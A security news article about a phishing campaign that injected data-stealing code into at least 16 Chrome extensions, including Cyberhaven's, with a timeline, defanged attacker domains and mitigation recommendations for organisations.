Malicious Chrome Extensions Expose Over 600,000 Users to Data Theft

A recent attack campaign has targeted Chrome browser extensions, compromising at least 16 legitimate extensions and putting over 600,000 users at risk. The attackers infiltrated these extensions by targeting their publishers through phishing campaigns, injecting malicious code, and leveraging access permissions to exfiltrate sensitive data like cookies and user tokens.

Cyberhaven: The First Known Victim

The first confirmed victim was Cyberhaven, a cybersecurity firm. On December 24, 2024, an employee was deceived by a phishing email, which allowed attackers to publish a compromised version of the company's browser extension.

Details of the Cyberhaven Breach:

• The malicious extension communicated with a command-and-control (C&C) server at cyberhavenext[.]pro.

• It downloaded additional configuration files and exfiltrated sensitive data.

• Cyberhaven disclosed the breach on December 27, revealing the sophisticated nature of the attack.

The Phishing Methodology

The phishing email impersonated Google Chrome Web Store Developer Support and warned recipients about potential policy violations. It urged them to grant permissions to a malicious OAuth application named "Privacy Policy Extension."

Key Steps in the Attack:

1. Phishing emails created a false sense of urgency.

2. Victims granted permissions to the malicious application.

3. Attackers used these permissions to inject malicious code into legitimate extensions.

Additional Compromised Extensions

After Cyberhaven's breach became public, researchers identified other extensions compromised in the campaign. These include:

• AI Assistant - ChatGPT and Gemini for Chrome

• GPT 4 Summary with OpenAI

• Reader Mode

• Rewards Search Automator

• Earny - Up to 20% Cash Back

• Visual Effects for Google Meet

• Parrot Talks

• And many more.

This wide-scale attack indicates that Cyberhaven was only one of many targets in a coordinated campaign.

Technical Analysis of the Attack

The attack was multi-layered and sophisticated:

• Phishing Entry Point: The campaign relied on convincing phishing emails.

• Code Injection: Malicious code was inserted into legitimate extensions.

• C&C Communication: The code connected to external servers to download additional payloads and steal data.

In the Cyberhaven breach, the malicious code specifically targeted Facebook account data, including business accounts, highlighting the attackers' focus on high-value targets.

Timeline and Scope

John Tuckner of Secure Annex traced the campaign back to at least April 2023. Domains such as nagofsg[.]com and sclpfybn[.]com were registered as early as 2022, suggesting the operation had been ongoing for years. Further analysis revealed interconnected malicious code across multiple extensions.

Organizational Response and Recommendations

Cyberhaven reported that the malicious extension was removed from the Chrome Web Store within 24 hours. However, removing the extension does not immediately resolve the threat. As long as the compromised version is still installed on users' devices, attackers can continue to exploit it.

Recommendations for Mitigating Risks:

1. Monitor Installed Extensions: Regularly audit browser extensions across endpoints.

2. Restrict Permissions: Limit the installation of extensions to trusted sources.

3. Employee Awareness: Educate staff on phishing risks and the dangers of granting permissions to unknown applications.

4. Leverage Security Tools: Deploy tools to monitor and flag suspicious browser extension activity.

Conclusion

This campaign serves as a stark reminder of the vulnerabilities posed by browser extensions. Often overlooked, extensions can become entry points for attackers to access sensitive data and compromise accounts.

Organizations must adopt proactive measures, including regular monitoring, restricted permissions, and employee training, to defend against similar threats in the future. The sophisticated and widespread nature of this attack highlights the need for vigilance and robust security practices.